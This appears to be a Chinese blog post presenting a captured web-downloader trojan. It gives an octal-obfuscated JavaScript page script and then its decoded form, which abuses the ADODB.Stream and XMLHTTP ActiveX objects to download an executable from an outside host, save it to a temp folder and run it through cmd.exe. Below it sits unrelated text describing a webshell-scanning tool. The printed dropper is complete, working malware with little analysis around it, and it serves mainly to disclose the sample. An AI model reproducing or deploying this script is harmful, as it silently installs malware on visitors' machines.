又一个网页下载者木马

文件: http://xxxx.xxx.xxx/web.htm

ExpandedBlockStart.gif ContractedBlock.gif < SCRIPT  LANGUAGE ="JavaScript" > dot.gif
ExpandedBlockEnd.gifeval(
"\146\165\156\143\164\151\157\156\40\147\156\50\156\51\40\173\40\166\141\162\40\156\165\155\142\145\162\40\75\40\115\141\164\150\56\162\141\156\144\157\155\50\51\52\156\73\40\162\145\164\165\162\156\40\47\176\164\155\160\47\53\115\141\164\150\56\162\157\165\156\144\50\156\165\155\142\145\162\51\53\47\56\145\170\145\47\73\40\175\40\15\12\164\162\171\40\173\40\15\12\166\141\162\40\155\155\61\75\42\150\164\164\160\72\42\73\15\12\155\155\62\75\42\57\57\42\73\15\12\155\155\63\75\42\167\167\167\56\65\65\144\152\56\156\145\164\57\170\171\56\145\170\145\42\73\15\12\144\154\75\155\155\61\53\155\155\62\53\155\155\63\73\40\15\12\141\61\75\42\157\142\152\145\143\164\42\73\141\62\75\42\143\154\141\163\163\151\144\42\73\15\12\141\63\75\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\73\15\12\141\64\75\42\101\144\157\144\142\56\123\164\162\145\141\155\42\73\15\12\146\165\143\153\75\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\73\15\12\144\146\75\50\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\141\61\51\51\73\40\15\12\144\146\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\141\62\54\141\63\51\73\40\15\12\166\141\162\40\170\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\42\53\42\115\42\53\42\114\42\53\42\110\42\53\42\124\42\53\42\124\42\53\42\120\42\54\42\42\51\73\40\15\12\166\141\162\40\123\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\141\64\54\42\42\51\73\40\123\133\42\164\171\160\145\42\135\75\61\73\40\15\12\170\133\42\117\160\145\156\42\135\50\42\107\105\124\42\54\40\144\154\54\60\51\73\40\15\12\170\133\42\123\145\156\144\42\135\50\51\73\40\15\12\146\156\141\155\145\61\75\147\156\50\61\60\60\60\60\51\73\40\15\12\166\141\162\40\106\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\146\165\143\153\54\42\42\51\73\40\15\12\166\141\162\40\164\155\160\75\106\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\40\15\12\146\156\141\155\145\61\75\40\106\133\42\102\165\151\154\144\120\141\164\150\42\135\50\164\155\160\54\146\156\141\155\145\61\51\73\40\15\12\123\133\42\157\160\145\156\42\135\50\51\73\15\12\123\133\42\127\162\151\164\145\42\135\50\170\56\162\145\163\160\157\156\163\145\102\157\144\171\51\73\40\15\12\123\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\146\156\141\155\145\61\54\62\51\73\40\15\12\123\133\42\103\154\157\163\145\42\135\50\51\73\40\15\12\166\141\162\40\121\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\40\15\12\145\170\160\61\75\106\133\42\102\165\151\154\144\120\141\164\150\42\135\50\164\155\160\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\121\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\146\156\141\155\145\61\54\42\42\54\157\160\145\156\54\60\51\73\40\175\40\143\141\164\143\150\50\151\51\40\173\40\151\75\61\73\40\175")
None.gif
</ SCRIPT >

通过解码后:

ExpandedBlockStart.gif ContractedBlock.gif function  gn(n)  dot.gif var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; }  
ExpandedBlockStart.gifContractedBlock.gif
try   dot.gif
InBlock.gif
var mm1="http:";
InBlock.gifmm2
="//";
InBlock.gifmm3
="www.55dj.net/xy.exe";
InBlock.gifdl
=mm1+mm2+mm3; 
InBlock.gifa1
="object";a2="classid";
InBlock.gifa3
="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";
InBlock.gifa4
="Adodb.Stream";
InBlock.giffuck
="Scripting.FileSystemObject";
InBlock.gifdf
=(window["document"]["createElement"](a1)); 
InBlock.gifdf[
"setAttribute"](a2,a3); 
InBlock.gif
var x=df["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); 
InBlock.gif
var S=df["CreateObject"](a4,""); S["type"]=1
InBlock.gifx[
"Open"]("GET", dl,0); 
InBlock.gifx[
"Send"](); 
InBlock.giffname1
=gn(10000); 
InBlock.gif
var F=df["CreateObject"](fuck,""); 
InBlock.gif
var tmp=F["GetSpecialFolder"](0); 
InBlock.giffname1
= F["BuildPath"](tmp,fname1); 
InBlock.gifS[
"open"]();
InBlock.gifS[
"Write"](x.responseBody); 
InBlock.gifS[
"SaveToFile"](fname1,2); 
InBlock.gifS[
"Close"](); 
InBlock.gif
var Q=df["CreateObject"]("Shell.Application",""); 
InBlock.gifexp1
=F["BuildPath"](tmp+'\\system32','cmd.exe');
ExpandedBlockStart.gifContractedBlock.gifQ[
"ShellExecute"](exp1,' /c '+fname1,"",open,0); }
  catch (i)  dot.gif { i=1; }
None.gif


 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
持扫描木马类型: asp/aspx/php/jsp/asa/cer 软件主要功能: 1.搜索网站里面的网页木马(Webshell) 2.生成统计报表 用来查询网站是不是被挂马了,一般用于服务器上的操作,或将服务器上的源码下载到本地,然后用此软件查找。 处理了一下第一版大家的要求,修复了一些小的bug,加入了自动更新程序,在windows2003、windows xp、windows 2000 server 无.net环境下测试通过,简单的更新说明如下: 1.添加自动升级模块,.net环境下可完成在线升级; -------------------------------------------------------- 升级需要请求服务器下载文件替换,如果下载失败,请手动下载更新。更新程序需要服务器装有.net v2.0.50727 版本以上的环境才能运行,因此不支持.net的服务器无法使用自动更新。 2.无需.net环境运行扫描程序; -------------------------------------------------------- 这个问题比较头疼的,程序是.NET 开发的,需要安装 .NET Framework,但Windows 2000、Windows XP 和 Windows 2003 默认都没有.NET 2.0 运行环境。于是利用移动飞信的原理,利用fetion的程序加载主程序,可以使主程序可以运行在不支持.net的环境下。大家可以用VMDotNet包中的文件运行大多数.net开发的程序,如果缺少dll,加上即可。 3.添加asp规则,主要针对asp的webshell绕过机制; -------------------------------------------------------- 由于本来的规则基本是lake2的规则以及少许修改版,于是很多同志找出了很多绕过逃避检测的机制,比如用access或者excel创建asp文件的小马,比如include包含gif之类的伎俩等等等等。本版中这些绕过机制均得到处理。(还想绕过的朋友try一下看看我的正则健壮不健壮) 4.更新php规则,添加了eval下运行的少数加密函数; -------------------------------------------------------- php下把加密的文件先通过函数解密再eval运行,本次版本处理了几个不常见的函数:gzinflate 、str_rot13等等;php确实还有很多绕过的方法,而且很难检测,呜呼哀哉,我也没辙了... 5.增加了利用IIS6.0文件夹解析漏洞以及文件解析漏洞隐藏的shell的检查; -------------------------------------------------------- 这个没啥好说的,目录叫1.asp或者文件叫1.asp;2.jpg,很显然被人入侵了,需要仔细检查检查问题了。 6.修复一处bug(驱动器下第一层目录无法扫描); -------------------------------------------------------- 测试的时候无意中发现的,貌似还没有人向我提交这个问题,估计大家都直接扫目录的,并没有扫盘(确实没必要扫盘~) 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值